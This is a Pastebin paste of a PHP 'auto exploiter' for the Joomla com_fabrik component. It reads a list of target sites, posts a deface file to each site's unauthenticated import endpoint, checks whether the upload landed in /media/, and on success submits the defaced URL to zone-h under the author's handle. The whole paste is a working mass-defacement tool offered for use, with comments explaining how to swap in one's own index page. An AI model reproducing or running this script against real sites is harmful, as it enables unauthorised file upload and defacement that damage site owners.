API tools faq
paste
Advertisement
Kro0oz

wis ~ fabrik exploiter

Kro0oz
Nov 20th, 2015
264
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.65 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3.   //com_fabrik auto exploiter
  4.   // coded by Kro0oz (wis)
  5.  
  6.  
  7.  
  8.   print"
  9. __  ___ .______        ______     ___     ______    ________  
  10. |  |/  / |   _  \      /  __  \   / _ \   /  __  \  |       /  
  11. |  '  /  |  |_)  |    |  |  |  | | | | | |  |  |  | `---/  /  
  12. |    <   |      /     |  |  |  | | | | | |  |  |  |    /  /    
  13. |  .  \  |  |\  \----.|  `--'  | | |_| | |  `--'  |   /  /----.
  14. |__|\__\ | _| `._____| \______/   \___/   \______/   /________|
  15.                                                              
  16.  
  17.                  ______
  18.                 |______| Coded By Kro0oz
  19.  
  20.           usage : php wis.php list.txt
  21.  
  22. ";
  23.  
  24.   $get2=@file_get_contents($argv[1]);
  25.   $e=explode("\r\n",$get2);
  26.   foreach($e as $site){
  27.    echo "[+]scaning : $site\n";
  28. $post = array(
  29. "userfile" => "@wis.txt", // this file is ur index  .html or .txt
  30. "name" => "wis.php",
  31. "drop_data" => "1",
  32. "overwrite" => "1",
  33. "field_delimiter" => ",",
  34. "text_delimiter" => "&quot;",
  35. "option" => "com_fabrik",
  36. "controller" => "import",
  37. "view" => "import",
  38. "task" => "doimport",
  39. "Itemid" => "0",
  40. "tableid" => "0",
  41. );
  42. $ch = curl_init ("$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1");
  43. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  44. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  45. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  46. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  47. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  48. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  49. curl_setopt ($ch, CURLOPT_POST, 1);
  50. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  51. $data = curl_exec ($ch);
  52. curl_close ($ch);
  53.  
  54. $ud=($site).("/media/wis.txt");  // wis.txt : rename it to name of ur index example if ur index named lol.html write it like that : /media/lol.html   :D
  55. $get22=@file_get_contents($ud);
  56. if(eregi("Hacked by Kro0oz ",$get22)){  // Hacked by Kro0oz : here put some words exist on ur index for cheek file was uploaded or no just 2 words or 3 or 1 example if u put ur name on index put it here
  57. echo "[-]Exploit : yes";
  58. echo "\n[-]Defaced : $ud\n";
  59.   $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  60.     curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  61.     curl_setopt ($ch3, CURLOPT_POST, 1);
  62.         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=Kro0oz&domain1=$ud&hackmode=1&reason=1");  // here put ur name on zone-h
  63.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  64.                 echo  "[-]Zone-h  : Ok  "."\n\n";
  65.         }else{
  66.                 echo "[-]Zone-h  : No"."\n\n"; }
  67.     curl_close ($ch3);
  68. }else{
  69.    echo "[-]Exploit : no\n\n";
  70. }
  71.  }
  72.  
  73.  
  74. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!